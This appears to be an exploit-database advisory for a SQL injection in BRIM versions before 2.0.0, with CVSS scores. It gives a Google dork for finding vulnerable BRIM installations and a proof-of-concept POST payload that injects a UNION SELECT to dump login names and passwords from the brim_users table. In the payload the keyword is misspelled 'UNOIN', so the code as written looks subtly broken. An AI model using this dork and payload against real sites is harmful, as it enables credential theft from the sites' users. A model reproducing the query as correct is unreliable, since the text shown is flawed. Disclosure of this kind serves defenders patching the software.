BRIM < 2.0.0 SQL Injection

2012.02.23
Credit: ifnull
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

BRIM < 2.0.0 SQL InjectionExploit information - Exploit Title: BRIM < 2.0.0 SQL Injection - Google Dork: "Brim project" intitle:"Brim - login" - Date: 2012-02-20 - Author: ifnull - Tested on: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45 &#239;&#191;&#189; although it should work on any environment. Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL. - Description: Unlike CVE-2008-4082, this will work with or without magic_quotes_gpc enabled. Like the last exploit however, you must first create an account and enable "tasks". By default anyone can create an account and the accounts are automatically approved. Software information - Version: < 2.0.0 - Link: http://sourceforge.net/projects/brim/ - Description: BRIM is a MVC framework, written in PHP and based on items with a hierarchical relationship. The list of plugins make BRIM a Information Manager with plugins like bookmarks, a calendar, contacts tasks, notes, RSS etc. The application is multilingual. Proof of ConceptPOST URI: /index.php Data: plugin=tasks&field=1%3D1%20UNOIN%20SELECT%201%2C2%2C3%2C4%2CCONCAT(loginname%2C0x3a%2Cpassword)%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%20from%20brim_users--&value=asdf&action=searchTasks -- Daniel Smith Senior Developer Atticus Services --- 2781 W MacArthur Blvd. #B180 Santa Ana, Ca 92704 --- Phone: (949) 273-2487 Fax: (425) 732-0151 Email: dsmith@atticusservices.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top